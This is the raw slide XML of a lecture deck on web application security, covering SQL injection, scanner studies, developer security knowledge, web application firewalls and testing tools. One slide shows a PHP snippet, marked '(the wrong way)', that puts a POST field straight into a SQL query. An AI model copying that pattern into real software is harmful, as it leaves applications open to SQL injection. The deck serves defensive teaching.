              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘recipient’  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>is malicious string that changes the meaning of the query?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6169869" y="990600"/>
            <a:ext cx="2059731" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(the wrong way)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1135917" y="2362201"/>
            <a:ext cx="7064375" cy="1600199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>recipient = $_POST[‘recipient’];  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> = "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PersonID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> FROM Person WHERE 	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                                    Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>='$recipient'";  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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99"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1494296"/>
            <a:ext cx="8229600" cy="475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Comparison of scanner vulnerability detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26165528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43063"/>
            <a:ext cx="7391400" cy="433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Developer security self-assessment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65504126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9955"/>
            <a:ext cx="7010400" cy="405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4476750" cy="1857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Language usage in sample</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-702110" y="3521511"/>
            <a:ext cx="2383153" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Number of applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348576605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fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security scanners are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>useful but not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>perfect </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>uned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>current trends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in web application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>comparisons performed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>testbeds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are not predictive in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>statistically meaningful way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ombined output of several scanners is a reasonable comparative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>measure of code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>security, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>compared to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>other quantitative measures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Based on scanner-based evaluation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Freelancers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are more prone to introducing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>injection vulnerabilities than startup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>developers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>statistically meaningful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>applications have statistically significant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>higher rates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of injection vulnerabilities than non-PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>applications; PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>applications tend not to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Startup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>developers are more knowledgeable about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cryptographic storage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and same-origin policy compared </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to freelancers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, again with statistical significance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Low correlation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>between developer security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>knowledge and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the vulnerability rates of their applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="6096000"/>
            <a:ext cx="6206571" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Warning: don’t hire freelancers to build secure web site in PHP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385899994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Additional solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"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Web Application Firewalls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1676400"/>
            <a:ext cx="8001000" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Help prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>some attacks we discuss today:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Form field tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="3962400"/>
            <a:ext cx="0" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34822" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5102225" y="3429000"/>
            <a:ext cx="3355975" cy="2511425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EAEAEA"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng"/>
              <a:t>Sample products</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Imperva </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Kavado Interdo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>F5 TrafficShield</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Citrix NetScaler </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CheckPoint Web Intel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Code checking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Blackbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> security testing services:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whitehatsec.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>blackbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> testing tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cenzic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hailstorm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Spidynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>WebInspect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eEye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Retina</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web application hardening tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebSSARI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>[WWW’04]  :    based on information flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nguyen-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tuong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>[IFIP’05]  :  based on tainting</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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad input checking allows malicious SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Known defenses address problem effectively</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF – Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forged request leveraging ongoing session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be prevented (if XSS problems fixed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem stems from echoing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Difficult to prevent; requires care, testing, tools, … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other server vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Increasing knowledge embedded in frameworks, tools, application development recommendations</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33065</TotalTime>
  <Words>4185</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>801</Paragraphs>
  <Slides>97</Slides>
  <Notes>20</Notes>
  <HiddenSlides>9</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97</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="104" baseType="lpstr">
      <vt:lpstr>Blueprint</vt:lpstr>
      <vt:lpstr>3_Blueprint</vt:lpstr>
      <vt:lpstr>4_Blueprint</vt:lpstr>
      <vt:lpstr>1_Blueprint</vt:lpstr>
      <vt:lpstr>2_Blueprint</vt:lpstr>
      <vt:lpstr>Image</vt:lpstr>
      <vt:lpstr>Acrobat Document</vt:lpstr>
      <vt:lpstr>Web Application Security</vt:lpstr>
      <vt:lpstr>OWASP Top Ten              (2013)</vt:lpstr>
      <vt:lpstr>Three vulnerabilities we will discuss</vt:lpstr>
      <vt:lpstr>Three vulnerabilities we will discuss</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>General code injection attacks</vt:lpstr>
